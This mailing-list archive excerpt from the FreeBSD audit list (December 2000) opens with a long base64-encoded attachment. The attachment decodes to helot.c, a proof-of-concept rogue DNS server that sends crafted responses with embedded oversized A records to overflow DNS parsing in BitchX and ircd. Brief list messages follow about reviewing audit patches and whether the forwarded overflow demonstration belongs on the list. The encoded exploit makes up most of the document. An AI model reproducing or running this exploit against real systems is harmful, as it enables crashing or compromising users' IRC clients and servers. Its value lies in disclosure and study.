aGFyICpRVHlwZTJTdHIoaW50IHF0eXBlKQp7CglpbnQgaSA9IDA7CgoJd2hpbGUocXR5cGVs aXN0W2ldLnR5cGUgJiYgcXR5cGVsaXN0W2ldLnR5cGUgIT0gcXR5cGUpCgkJaSsrOwoJcmV0 dXJuKHF0eXBlbGlzdFtpXS5uYW1lKTsKfQoKLyoKICogTWFrZUROU1BrdCgpCiAqCiAqIGRl c2M6IG1ha2UgYSBkbnMgYW5zd2VyIHBhY2tldCBmb3IgYSBxdWVzdGlvbgogKiBpbnB1dDog cG9pbnRlciB0byBvcmlnaW5hbCBxdWVyeSBwYWNrZXQgdG8gYnVpbGQgYW5zd2VyIGZvciwg cG9pbnRlciB0bwogKglhbnN3ZXIgcGFja2V0IGJ1ZmZlciwgYnVmZmVyIGxlbmd0aCwgYW5z d2VyIGRhdGEsIGFkZGl0aW9uYWwgZGF0YSwKICoJdGltZS10by1saXZlIAogKiBvdXRwdXQ6 IHJldHVybnMgc2l6ZSBvZiBhbnN3ZXIgcGFja2V0LCBvciBOVUxMCiAqLwp1X3Nob3J0IE1h a2VETlNQa3QoY2hhciAqcXBrdCwgY2hhciAqYXBrdCwgdV9zaG9ydCBhbGVuLCBjaGFyICph bnN3ZXIsCgljaGFyICphZGRpdGlvbmFsLCB1X2xvbmcgdHRsKQp7Cgl1X3Nob3J0IHN6LCBv ZmZzZXQ7IAoJaW50IHF0eXBlOwoJSEVBREVSICpxaGRyLCAqYWhkcjsKCWNoYXIgKnF1ZXJ5 LCAqYXF1ZXJ5LCAqYW5zd2VyUlI7CgljaGFyIHFuYW1lW01BWEROQU1FXTsgLyogZG9tYWlu IG5hbWUgbGFiZWwgc2NyYXRjaCBwYWQgKi8KCWNoYXIgKmNwLCAqY3AyOwoKCS8qIGRvIHNv bWUgY2hlY2tzICovCglpZihxcGt0ID09IE5VTEwgfHwgYXBrdCA9PSBOVUxMIHx8IGFuc3dl ciA9PSBOVUxMIHx8IGFkZGl0aW9uYWwgPT0gTlVMTCkKCQlyZXR1cm4oMCk7CgoJLyogc2V0 dXAgcG9pbnRlcnMgKi8KCXFoZHIgPSAoSEVBREVSICopcXBrdDsgYWhkciA9IChIRUFERVIg KilhcGt0OwoJcXVlcnkgPSBxcGt0ICsgSEZJWEVEU1o7IGFxdWVyeSA9IGFwa3QgKyBIRklY RURTWjsKCgkvKiBhbnN3ZXIgcGFja2V0IGRucyBoZWFkZXIsIHdlIHVzZSB0aGUgcXVlcnkg cGFja2V0J3MgaGRyICovCglpZihhbGVuIDwgSEZJWEVEU1opCgkJcmV0dXJuKDApOwoJbWVt Y3B5KGFoZHIsIHFoZHIsIEhGSVhFRFNaKTsKCWFoZHItPnFyID0gMTsgLyogcXVlcnkgcmVz cG9uc2UgKi8KCWFoZHItPmFhID0gMTsgLyogYXV0aG9yYXRhdGl2ZSBhbnN3ZXIgKi8KCWFo ZHItPnJjb2RlID0gTk9FUlJPUjsKCgkvKiBjb3B5IG9yaWdpbmFsIHF1ZXJ5IGluZm8gdG8g YW5zd2VyIHBhY2tldCAqLwoJbWVtY3B5KGFxdWVyeSwgcXVlcnksIChzdHJsZW4ocXVlcnkp ICsgUUZJWEVEU1ogKyAxKSk7CglhcXVlcnkgKz0gc3RybGVuKHF1ZXJ5KSArIDE7CglHRVRT SE9SVChxdHlwZSwgYXF1ZXJ5KTsKCWFuc3dlclJSID0gYXF1ZXJ5ICsgSU5UMTZTWjsKCgkv KiBidWlsZCB0aGUgYW5zd2VyIFJSJ3MgYmFzZWQgb24gcXVlcnkgdHlwZSAqLwoJc3ogPSBD b21wRE5hbWUocW5hbWUsIGFuc3dlcik7CgoJc3dpdGNoKHF0eXBlKQoJewoJCWNhc2UgVF9Q VFI6CgkJCS8qIGFuc3dlciB0aGUgb3JpZ2luYWwgcXVlc3Rpb24uIHRoaXMgUlIncyBkYXRh IAoJCQkgKiBjb21lcyBmcm9tIHRoZSAiaG9zdG5hbWUiIGNtZGxpbmUgb3B0aW9uLgoJCQkg KiB0aGlzIGlzIGEgbm9ybWFsIGFuZCB2YWxpZCByZXNvdXJjZSByZWNvcmQKCQkJICovCgkJ CVBVVFNIT1JUKChIRklYRURTWiB8IDB4YzAwMCksIGFuc3dlclJSKTsKCQkJUFVUU0hPUlQo VF9QVFIsIGFuc3dlclJSKTsKCQkJUFVUU0hPUlQoQ19JTiwgYW5zd2VyUlIpOwoJCQlQVVRM T05HKHR0bCwgYW5zd2VyUlIpOwoJCQlQVVRTSE9SVChzeiwgYW5zd2VyUlIpOwoJCQltZW1j cHkoYW5zd2VyUlIsIHFuYW1lLCBzeik7CgkJCW9mZnNldCA9IGFuc3dlclJSIC0gYXBrdDsg Lyogb2Zmc2V0IHVzZWQgZm9yIGNvbXByZXNzaW9uICovCgkJCWFuc3dlclJSICs9IHN6OwoK CQkJLyogdGhpcyBSUiwgVF9OVUxMIGRlbW9uc3RyYXRlcyBwcm9ibGVtIDEuIHRoaXMgUlIg aGFzCgkJCSAqIGFuIGVtYmVkZGVkIFRfQSByZWNvcmQgaW4gaXQncyBkYXRhIGZpZWxkCgkJ CSAqLwoJCQlQVVRTSE9SVCgoSEZJWEVEU1ogfCAweGMwMDApLCBhbnN3ZXJSUik7CgkJCVBV VFNIT1JUKFRfTlVMTCwgYW5zd2VyUlIpOwoJCQlQVVRTSE9SVChDX0lOLCBhbnN3ZXJSUik7 CgkJCVBVVExPTkcodHRsLCBhbnN3ZXJSUik7CgkJCWNwID0gYW5zd2VyUlI7IC8qIHBvaW50 ZXIgdG8gVF9OVUxMIFJSJ3MgZGF0YSBsZW5naCAqLwoJCQlQVVRTSE9SVCgwLCBhbnN3ZXJS Uik7CgkJCWNwMiA9IGFuc3dlclJSOwkvKiBwb2ludGVyIHRvIHN0YXJ0IG9mIGVtYmVkZGVk IFRfQSBSUiAqLwoJCQkJCgkJCS8qIFRfQSByZWNvcmQgaXMgYWN0dWFsbHkgZW1iZWRkZWQg aW4gdGhlIFRfTlVMTCByZWNvcmQuCgkJCSAqIGJpdGNoeC9pcmNkIHdpbGwgcmVhZCBpbnRv IHRoaXMgVF9BIHJlY29yZCBvbiB0aGUgbmV4dCBsb29wLgoJCQkgKiB0aGlzIGxldHMgdXMg Z2V0IGFyb3VuZCByZXN0cmljdGlvbnMgaW4gQklORCBvbiBUX0EgUlIncwoJCQkgKgoJCQkg KiB0aGlzIFJSIGNhdXNlcyBwcm9ibGVtcyAyICYgMyAtLSB0aGUgb3ZlcmZsb3cKCQkJICov CgkJCVBVVFNIT1JUKChvZmZzZXQgfCAweGMwMDApLCBhbnN3ZXJSUik7CgkJCVBVVFNIT1JU KFRfQSwgYW5zd2VyUlIpOwoJCQlQVVRTSE9SVChDX0lOLCBhbnN3ZXJSUik7CQoJCQlQVVRM T05HKHR0bCwgYW5zd2VyUlIpOwoJCQlQVVRTSE9SVCgxODAsIGFuc3dlclJSKTsgLyogb3Zl cmZsb3cgd2l0aCAxODAgTidzICovCgkJCW1lbXNldChhbnN3ZXJSUiwgJ04nLCAxODApOwoJ CQlhbnN3ZXJSUiArPSAxODA7CgoJCQkvKiBjb21wdXRlIHNpemUgb2YgZW1iZWRkZWQgVF9B ICYgdXBkYXRlIFRfTlVMTCdzIGRsZW5ndGggKi8KCQkJUFVUU0hPUlQoKGFuc3dlclJSIC0g Y3AyKSwgY3ApOwoKCQkJLyogdGhpcyByZWNvcmQgaXMgbmVlZGVkIHRvIGNvbnRpbnVlIHRo ZSBkbnMgbG9vcCBpbgoJCQkgKiBiaXRjaHgvaXJjZC4gaXQgY2FuIGJlIGFueSBSUiwgaSB1 c2VkIFRfTlVMTAoJCQkgKi8gCiAgICAgICAgICAgICAgICAgICAgICAgIFBVVFNIT1JUKChI RklYRURTWiB8IDB4YzAwMCksIGFuc3dlclJSKTsKICAgICAgICAgICAgICAgICAgICAgICAg UFVUU0hPUlQoVF9OVUxMLCBhbnN3ZXJSUik7CiAgICAgICAgICAgICAgICAgICAgICAgIFBV VFNIT1JUKENfSU4sIGFuc3dlclJSKTsKICAgICAgICAgICAgICAgICAgICAgICAgUFVUTE9O Ryh0dGwsIGFuc3dlclJSKTsKICAgICAgICAgICAgICAgICAgICAgICAgUFVUU0hPUlQoMCwg YW5zd2VyUlIpOwoKCQkJYWhkci0+YW5jb3VudCA9IGh0b25zKDMpOwoJCQlhaGRyLT5uc2Nv dW50ID0gaHRvbnMoMCk7CgkJCWFoZHItPmFyY291bnQgPSBodG9ucygwKTsKCQkJYnJlYWs7 CgoJCWNhc2UgVF9BOgoJCQkvKiBCSU5EIGRlZW1zIFRfQSByZWNvcmRzIHdpdGggZGF0YSBs ZW5ndGggPD4gNCBieXRlcwoJCQkgKiB0byBiZSBtYWxmb3JtZWQuIHNvIHdlIG11c3QgZW1i ZWQgdGhlIFJSLgoJCQkgKi8KCQkJUFVUU0hPUlQoKEhGSVhFRFNaIHwgMHhjMDAwKSwgYW5z d2VyUlIpOwoJCQlQVVRTSE9SVChUX05VTEwsIGFuc3dlclJSKTsKCQkJUFVUU0hPUlQoQ19J TiwgYW5zd2VyUlIpOwoJCQlQVVRMT05HKHR0bCwgYW5zd2VyUlIpOwoJCQljcCA9IGFuc3dl clJSOwoJCQlQVVRTSE9SVCgwLCBhbnN3ZXJSUik7CgkJCWNwMiA9IGFuc3dlclJSOwoKCQkJ LyogcHJvYmxlbSAyICYgMyBkZW1vbnN0cmF0ZWQgd2l0aCBhIFRfQSBxdWVyeSAqLwoJCQlQ VVRTSE9SVCgoSEZJWEVEU1ogfCAweGMwMDApLCBhbnN3ZXJSUik7CgkJCVBVVFNIT1JUKFRf QSwgYW5zd2VyUlIpOwoJCQlQVVRTSE9SVChDX0lOLCBhbnN3ZXJSUik7CgkJCVBVVExPTkco dHRsLCBhbnN3ZXJSUik7CgkJCVBVVFNIT1JUKDE4MCwgYW5zd2VyUlIpOyAKCQkJbWVtc2V0 KGFuc3dlclJSLCAnQScsIDE4MCk7CgkJCWFuc3dlclJSICs9IDE4MDsKCgkJCS8qIGZpeCB1 cCB0aGUgc2l6ZSBvZiB0aGUgVF9OVUxMICovCgkJCVBVVFNIT1JUKChhbnN3ZXJSUiAtIGNw MiksIGNwKTsKCgkJCS8qIGFub3RoZXIgVF9OVUxMIC4uLiAqLwogICAgICAgICAgICAgICAg ICAgICAgICBQVVRTSE9SVCgoSEZJWEVEU1ogfCAweGMwMDApLCBhbnN3ZXJSUik7CiAgICAg ICAgICAgICAgICAgICAgICAgIFBVVFNIT1JUKFRfTlVMTCwgYW5zd2VyUlIpOwogICAgICAg ICAgICAgICAgICAgICAgICBQVVRTSE9SVChDX0lOLCBhbnN3ZXJSUik7CiAgICAgICAgICAg ICAgICAgICAgICAgIFBVVExPTkcodHRsLCBhbnN3ZXJSUik7CiAgICAgICAgICAgICAgICAg ICAgICAgIFBVVFNIT1JUKDAsIGFuc3dlclJSKTsKCgkJCWFoZHItPmFuY291bnQgPSBodG9u cygyKTsKICAgICAgICAgICAgICAgICAgICAgICAgYWhkci0+bnNjb3VudCA9IGh0b25zKDAp OwogICAgICAgICAgICAgICAgICAgICAgICBhaGRyLT5hcmNvdW50ID0gaHRvbnMoMCk7CiAg ICAgICAgICAgICAgICAgICAgICAgIGJyZWFrOwoKCQlkZWZhdWx0OgoJCQlmcHJpbnRmKHN0 ZGVyciwgIlxudHlwZSAlZCBxdWVyeSBub3Qgc3VwcG9ydGVkXG4iLAoJCQkJcXR5cGUpOwoJ CQlyZXR1cm4oMCk7Cgl9CgoJcmV0dXJuKGFuc3dlclJSIC0gKGNoYXIgKilhaGRyKTsKfQoK LyoKICogU29ja2V0QmluZCgpCiAqCiAqIGRlc2M6IGdldCdzIGEgdWRwIHNvY2tldCBhbmQg YmluZHMgaXQgdG8gZG5zIHBvcnQgNTMgYW5kIGFuIElQIGFkZHJlc3MKICogaW5wdXQ6IHBp ZCB0byBraWxsIGJlZm9yZSBiaW5kLCBzdHJ1Y3Qgc29ja2FkZHIgaW5pdGlhbGl6ZSwgSVAg YWRkcmVzcwogKiBvdXRwdXQ6IHNvY2tldCBkZXNjcmlwdG9yLCBvciAtMSBvbiBlcnJvcgog Ki8KaW50IFNvY2tldEJpbmQodV9zaG9ydCBwaWQsIHN0cnVjdCBzb2NrYWRkcl9pbiAqc2Es IHVfbG9uZyBsaXN0ZW5faXApCnsKCWludCBzZCwgc29ja29wdCwgc29ja29wdGxlbjsKCglp Zigoc2QgPSBzb2NrZXQoQUZfSU5FVCwgU09DS19ER1JBTSwgMCkpIDwgMCkKCXsKCQlwZXJy b3IoImNhbid0IGdldCBhIHVkcCBzb2NrZXQiKTsKCQlyZXR1cm4oc2QpOwoJfQoKCQoJaWYo cGlkKQoJewoJCWZwcmludGYoc3RkZXJyLCAia2lsbGluZyBwaWQgJXUuLi4iLCBwaWQpOwoJ CWlmKGtpbGwocGlkLCBTSUdLSUxMKSA8IDApCgkJewoJCQlwZXJyb3IoImNhbid0IGtpbGwg cHJvY2VzcyIpOwoJCQlyZXR1cm4oLTEpOwoJCX0KCQlmcHJpbnRmKHN0ZGVyciwgImtpbGxl ZC5cbiIpOwoJfQoKCXNhLT5zaW5fZmFtaWx5ID0gQUZfSU5FVDsKCXNhLT5zaW5fcG9ydCA9 IGh0b25zKEROU19QT1JUKTsKCXNhLT5zaW5fYWRkci5zX2FkZHIgPSBsaXN0ZW5faXA7Cglz b2Nrb3B0ID0gMTsgc29ja29wdGxlbiA9IDQ7CglzZXRzb2Nrb3B0KHNkLCBTT0xfU09DS0VU LCBTT19SRVVTRUFERFIsIChjaGFyICopJnNvY2tvcHQsIHNvY2tvcHRsZW4pOwoKCWlmKGJp bmQoc2QsIChzdHJ1Y3Qgc29ja2FkZHIgKilzYSwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikp IDwgMCkKCXsKCQlwZXJyb3IoImNhbid0IGJpbmQgZG5zIHBvcnQgNTMiKTsKCQlyZXR1cm4o LTEpOwoJfQoKCWZwcmludGYoc3RkZXJyLCAibGlzdGVuaW5nIG9uICVzLi4uXG4iLCBpbmV0 X250b2Eoc2EtPnNpbl9hZGRyKSk7CglyZXR1cm4oc2QpOwp9CgovKgogKiBTZW5kUGt0KCkK ICoKICogZGVzYzogc2VuZCBkbnMgYW5zd2VyIHBhY2tldCBpbnRvIHRoZSBncmVhdCB1bmtu b3duCiAqIGlucHV0OiBzb2NrZXQsIHJlY2VpdmVkIHBhY2tldCwgYW5zd2VyIHN0cmluZywg YWRkaXRpb25hbCBhbnN3ZXIsIHR0bCwKICoJc3RydWN0IHNvY2thZGRyIGZyb20sIGZyb20g bGVuZ3RoCiAqIG91dHB1dDogcmV0dXJucyAjIGJ5dGVzIHNlbnQsIDwgMCBvbiBlcnJvcgog Ki8KaW50IFNlbmRQa3QoaW50IHNkLCBjaGFyICpyYnVmLCBjaGFyICphbnN3ZXIsIGNoYXIg KmFkZGl0aW9uYWwsIHVfbG9uZyB0dGwsCglzdHJ1Y3Qgc29ja2FkZHJfaW4gKnRvLCBpbnQg dG9sZW4pCnsKCWNoYXIgc2J1ZltQQUNLRVRTWl07CglpbnQgc2xlbiwgc2VudDsKCglzbGVu ID0gTWFrZUROU1BrdChyYnVmLCBzYnVmLCBQQUNLRVRTWiwgYW5zd2VyLCBhZGRpdGlvbmFs LCB0dGwpOwoJaWYoIXNsZW4pCgl7CgkJZnByaW50ZihzdGRlcnIsICJlcnJvciBidWlsZGlu ZyBhbnN3ZXIgcGFja2V0XG4iKTsKCQlyZXR1cm4oLTEpOwoJfQoJaWYoKHNlbnQgPSBzZW5k dG8oc2QsIHNidWYsIHNsZW4sIDAsIChzdHJ1Y3Qgc29ja2FkZHIgKil0bywgdG9sZW4pKSA8 IDApCgl7CgkJcGVycm9yKCJzZW5kaW5nIGFuc3dlciBwYWNrZXQiKTsKCQlyZXR1cm4oc2Vu dCk7Cgl9CglyZXR1cm4oc2VudCk7Cn0KCQovKgogKiBtYWluKCkKICovCmludCBtYWluKGlu dCBhcmdjLCBjaGFyICphcmd2W10pCnsKCWludCBzZCwgb3B0LCBybGVuLCBmcm9tbGVuLCBz ZW50LCBxdHlwZTsKCXVfc2hvcnQga2lsbHBpZCA9IDA7Cgl1X2xvbmcgdHRsID0gKDE1ICog NjApLCBpcCwgYmluZF9pcCA9IDA7CgljaGFyIHJidWZbUEFDS0VUU1pdOwoJY2hhciAqcW5h bWUgPSBOVUxMLCAgKmluYWRkcnN0ciA9IE5VTEwsICpob3N0bmFtZSA9IE5VTEw7CglzdHJ1 Y3Qgc29ja2FkZHJfaW4gbmFtZWQsIGZyb207CglmZF9zZXQgZG5zOwoKCWZwcmludGYoc3Rk ZXJyLCJcCmhlbG90LmMgLSBiaXRjaHgvaXJjZCBETlMgb3ZlcmZsb3cgZGVtb25zdHJhdGlv bgoxMi4wNC4yMDAwIG5pbXJvb2QgKG5pbXJvb2RAb25lYm94LmNvbSkKdzAwdzAwIFNlY3Vy aXR5IERldmVsb3BtZW50IChXU0QpXG5cbiIpOwoKCXdoaWxlKChvcHQgPSBnZXRvcHQoYXJn YywgYXJndiwgIms6dDpiOiIpKSAhPSAtMSkKCXsKCQlzd2l0Y2gob3B0KQoJCXsKCQkJY2Fz ZSAnayc6CgkJCQlraWxscGlkID0gYXRvaShvcHRhcmcpOwoJCQkJYnJlYWs7CgkJCWNhc2Ug J3QnOgoJCQkJdHRsID0gc3RydG91bChvcHRhcmcsIE5VTEwsIDApOwoJCQkJYnJlYWs7CgkJ CWNhc2UgJ2InOgoJCQkJaWYoKGJpbmRfaXAgPSBpbmV0X2FkZHIob3B0YXJnKSkgPT0gLTEp CgkJCQl7CgkJCQkJZnByaW50ZihzdGRlcnIsIAoJCQkJCSIlcyBpcyBub3QgYW4gaXAgYWRk cmVzcyFcbiIsIG9wdGFyZyk7CgkJCQkJZXhpdCgtMSk7CgkJCQl9CgkJCQlicmVhazsKCQkJ Y2FzZSAnPyc6CgkJCQlVc2FnZShhcmd2WzBdKTsKCQkJCS8qIE5PVCBSRUFDSEVEICovCgkJ CWRlZmF1bHQ6CgkJCQlmcHJpbnRmKHN0ZGVyciwgImdldG9wdCgpIGVycm9yIGRvaCFcbiIp OwoJCQkJZXhpdCgtMSk7CgkJfQoJfQoKCS8qIGdldCBpcCBhZGRyZXNzIGFuZCBob3N0bmFt ZSB0byB1c2UgZm9yIGFuc3dlcnMgKi8KCWlmKChhcmdjIC0gb3B0aW5kKSAhPSAyKQoJCVVz YWdlKGFyZ3ZbMF0pOwoKCWlmKChpcCA9IGluZXRfYWRkcihhcmd2W29wdGluZF0pKSA9PSAt MSkKCXsKCQlmcHJpbnRmKHN0ZGVyciwgIiVzIG5vdCBhbiBpcCBhZGRyZXNzIVxuIiwgYXJn dltvcHRpbmRdKTsKCQlleGl0KC0xKTsKCX0KCQogICAgICAgIC8qIGdldCBhIHNvY2tldCBh bmQgYmluZCBpdCB0byB0aGUgZG5zIHBvcnQgNTMgKi8KICAgICAgICBpZigoc2QgPSBTb2Nr ZXRCaW5kKGtpbGxwaWQsICZuYW1lZCwgYmluZF9pcCkpIDwgMCkKICAgICAgICB7CiAgICAg ICAgICAgICAgICBmcHJpbnRmKHN0ZGVyciwgImVycm9yIHNldHRpbmcgdXAgbmV0d29yayFc biIpOwogICAgICAgICAgICAgICAgZ290byBleGl0X2hlbG90OwogICAgICAgIH0KCglpZigo aG9zdG5hbWUgPSBtYWxsb2Moc3RybGVuKGFyZ3ZbKytvcHRpbmRdKSArIDIpKSA9PSBOVUxM KQoJewoJCWZwcmludGYoc3RkZXJyLCAiY2FuJ3QgZ2V0IG1lbW9yeSBmb3IgaG9zdG5hbWUh XG4iKTsKCQlnb3RvIGV4aXRfaGVsb3Q7Cgl9CglzdHJjcHkoaG9zdG5hbWUsIGFyZ3Zbb3B0 aW5kXSk7CglpZigqKGhvc3RuYW1lICsgc3RybGVuKGhvc3RuYW1lKSkgIT0gJy4nKQoJCXN0 cmNhdChob3N0bmFtZSwgIi4iKTsKCglpZigoaW5hZGRyc3RyID0gaXAySW5BZGRyU3RyKGlw KSkgPT0gTlVMTCkKCXsKCQlmcHJpbnRmKHN0ZGVyciwgImNhbid0IGdldCBtZW1vcnkgZm9y IGluLWFkZHIgc3RyaW5nIVxuIik7CgkJZ290byBleGl0X2hlbG90OwoJfQoKCS8qIGNhdGNo IGN0cmwtYyBzbyBpIGNhbiBmcmVlIHVzZWQgbWVtb3J5ICovCglzaWduYWwoU0lHSU5ULCBD YXRjaFNpZ0ludCk7CgoJd2hpbGUoMSkKCXsKCQlGRF9aRVJPKCZkbnMpOwoJCUZEX1NFVChz ZCwgJmRucyk7CgkJaWYoc2VsZWN0KChzZCArIDEpLCAmZG5zLCBOVUxMLCBOVUxMLCBOVUxM KSA8IDApCgkJewoJCQlwZXJyb3IoImVycm9yIG9uIGxpc3RlbmluZyBzb2NrZXQiKTsKCQkJ YnJlYWs7CgkJfQoKCQlpZihGRF9JU1NFVChzZCwgJmRucykpCgkJewoJCQlmcm9tbGVuID0g c2l6ZW9mKGZyb20pOwoJCQlpZigocmxlbiA9IHJlY3Zmcm9tKHNkLCByYnVmLCBQQUNLRVRT WiwgMCwgCgkJCQkoc3RydWN0IHNvY2thZGRyICopJmZyb20sICZmcm9tbGVuKSkgPCAwKQoJ CQl7CgkJCQlwZXJyb3IoImVycm9yIHJlYWRpbmcgZnJvbSBzb2NrZXQiKTsKCQkJCWJyZWFr OwoJCQl9CgoJCQlpZighcmxlbikKCQkJewoJCQkJZnByaW50ZihzdGRlcnIsICJmcm9tICVz LCBlbXB0eSBwYWNrZXRcbiIsCgkJCQkJaW5ldF9udG9hKGZyb20uc2luX2FkZHIpKTsKCQkJ CWNvbnRpbnVlOwoJCQl9CgoJCQlpZigocW5hbWUgPSBQcm9jRE5TUGt0KHJidWYsIHJsZW4s ICZxdHlwZSkpID09IE5VTEwpCgkJCXsKCQkJCWZwcmludGYoc3RkZXJyLCAiZnJvbSAlcywg bm8gcXVlcnlcbiIsCgkJCQkJaW5ldF9udG9hKGZyb20uc2luX2FkZHIpKTsKCQkJCWNvbnRp bnVlOwoJCQl9CgkJCQoJCQlmcHJpbnRmKHN0ZGVyciwgImZyb20gJXMsICVzLyVzLCBxdWVy eSIsIGluZXRfbnRvYShmcm9tLnNpbl9hZGRyKSwKCQkJCXFuYW1lLCBRVHlwZTJTdHIocXR5 cGUpKTsKCgkJCWlmKHN0cmNhc2VjbXAocW5hbWUsIGluYWRkcnN0cikgPT0gMCAmJiBxdHlw ZSA9PSBUX1BUUikKCQkJewoJCQkJc2VudCA9IFNlbmRQa3Qoc2QsIHJidWYsIGhvc3RuYW1l LCAoY2hhciAqKSZpcCwKCQkJCQl0dGwsICZmcm9tLCBmcm9tbGVuKTsKCQkJCWlmKHNlbnQg PD0gMCkKCQkJCXsKCQkJCQlmcHJpbnRmKHN0ZGVyciwgIm5vIGFuc3dlciBzZW50ISFcbiIp OwoJCQkJCWJyZWFrOwoJCQkJfQoKCQkJCWZwcmludGYoc3RkZXJyLCAiIGFuc3dlcmVkLlxu Iik7CgkJCQljb250aW51ZTsKCQkJfQoKCQkJaWYoc3RyY2FzZWNtcChxbmFtZSwgaG9zdG5h bWUpID09IDAgJiYgcXR5cGUgPT0gVF9BKQoJCQl7CgkJCQlzZW50ID0gU2VuZFBrdChzZCwg cmJ1ZiwgaG9zdG5hbWUsIChjaGFyICopJmlwLCAKCQkJCQl0dGwsICZmcm9tLCBmcm9tbGVu KTsKCQkJCWlmKHNlbnQgPD0gMCkKCQkJCXsKCQkJCQlmcHJpbnRmKHN0ZGVyciwgIm5vIGFu c3dlciBzZW50ISFcbiIpOwoJCQkJCWJyZWFrOwoJCQkJfQoKCQkJCWZwcmludGYoc3RkZXJy LCAiIGFuc3dlcmVkXG4iKTsKCQkJfQoJCX0KCQlmcHJpbnRmKHN0ZGVyciwiXG4iKTsKCX0K CmV4aXRfaGVsb3Q6CglmcHJpbnRmKHN0ZGVyciwgIlxuY2xlYW5pbmcgdXAuLi5cbiIpOwoJ ZnJlZShxbmFtZSk7IGZyZWUoaG9zdG5hbWUpOyBmcmVlKGluYWRkcnN0cik7IGNsb3NlKHNk KTsKCWV4aXQoLTEpOwp9Cg== --1BoxPartBoundary97620769315457976207693-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Fri Dec 8 2:34:36 2000 From owner-freebsd-audit@FreeBSD.ORG Fri Dec 8 02:34:35 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from eeyore.local.dohd.org (d0030.upc-d.chello.nl [213.46.0.30]) by hub.freebsd.org (Postfix) with ESMTP id 52C5337B400 for ; Fri, 8 Dec 2000 02:34:35 -0800 (PST) Received: by eeyore.local.dohd.org (Postfix, from userid 1008) id 132DBBA0A; Fri, 8 Dec 2000 11:34:33 +0100 (MET) Date: Fri, 8 Dec 2000 11:34:32 +0100 From: Mark Huizer To: audit@freebsd.org Subject: Re: audit code being submitted lately.. Message-ID: <20001208113432.A23604@dohd.cx> References: <20001205221546.C575@puck.firepipe.net> <20001205195502.A9566@citusc.usc.edu> <20001205225611.D575@puck.firepipe.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <20001205225611.D575@puck.firepipe.net>; from will@physics.purdue.edu on Tue, Dec 05, 2000 at 10:56:11PM -0500 Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG > > At this stage most of the patches are at the stage of "proposed > > patches" and need to be audited by at least one other person to make > > sure they a) actually fix problems, b) don't miss anything, and c) > > don't break things. The more complex the patches the more people > > should ideally be auditing them..usually with my patches I feel > > comfortable committing them if at least 2 people whose skills I trust > > give the ok. > Ok. Who's on this list of "people whose skills" you trust? I'd like to > go bother a couple people until they review these patches. :-) Just on the list for 2 weeks, I wonder where I can find patches I might review in my spare time... Any links? Mark -- Nice testing in little China... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Fri Dec 8 15:56: 0 2000 From owner-freebsd-audit@FreeBSD.ORG Fri Dec 8 15:55:59 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id B002337B400 for ; Fri, 8 Dec 2000 15:55:57 -0800 (PST) Received: by puck.firepipe.net (Postfix, from userid 1000) id 362A918CF; Fri, 8 Dec 2000 18:55:57 -0500 (EST) Date: Fri, 8 Dec 2000 18:55:57 -0500 From: Will Andrews To: Mark Huizer Cc: audit@FreeBSD.ORG Subject: Re: audit code being submitted lately.. Message-ID: <20001208185557.R572@puck.firepipe.net> Reply-To: Will Andrews Mail-Followup-To: Will Andrews , Mark Huizer , audit@FreeBSD.ORG References: <20001205221546.C575@puck.firepipe.net> <20001205195502.A9566@citusc.usc.edu> <20001205225611.D575@puck.firepipe.net> <20001208113432.A23604@dohd.cx> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001208113432.A23604@dohd.cx>; from freebsd@dohd.org on Fri, Dec 08, 2000 at 11:34:32AM +0100 X-Operating-System: FreeBSD 4.2-STABLE i386 Sender: will@puck.firepipe.net Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Fri, Dec 08, 2000 at 11:34:32AM +0100, Mark Huizer wrote: > Just on the list for 2 weeks, I wonder where I can find patches I might > review in my spare time... Any links? http://docs.freebsd.org/mail/.../freebsd-audit.html -- wca To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Fri Dec 8 16: 0: 7 2000 From owner-freebsd-audit@FreeBSD.ORG Fri Dec 8 16:00:06 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id E987A37B400 for ; Fri, 8 Dec 2000 16:00:05 -0800 (PST) Received: by puck.firepipe.net (Postfix, from userid 1000) id 856E118CF; Fri, 8 Dec 2000 19:00:04 -0500 (EST) Date: Fri, 8 Dec 2000 19:00:04 -0500 From: Will Andrews To: Mike Silbersack Cc: freebsd-audit@FreeBSD.ORG Subject: Re: bitchx/ircd DNS overflow demonstration (fwd) Message-ID: <20001208190004.S572@puck.firepipe.net> Reply-To: Will Andrews References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from silby@silby.com on Fri, Dec 08, 2000 at 12:34:35AM -0600 X-Operating-System: FreeBSD 4.2-STABLE i386 Sender: will@puck.firepipe.net Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Fri, Dec 08, 2000 at 12:34:35AM -0600, Mike Silbersack wrote: > Since people appear to be on an auditing rampage, I thought I'd forward > this over to the list. It describes some DNS parsing bugs in a few ircds > and BitchX that seem to have serious consequences. It may be worth a look > into if programs in the base system have similar problems. Err, this is out of the list's charter IMO. We're only here to audit code in FreeBSD itself. Anyone want to clarify the charter? Actually, I don't see any charter anywhere.. -- wca To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Fri Dec 8 16:10:44 2000 From owner-freebsd-audit@FreeBSD.ORG Fri Dec 8 16:10:42 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from silby.com 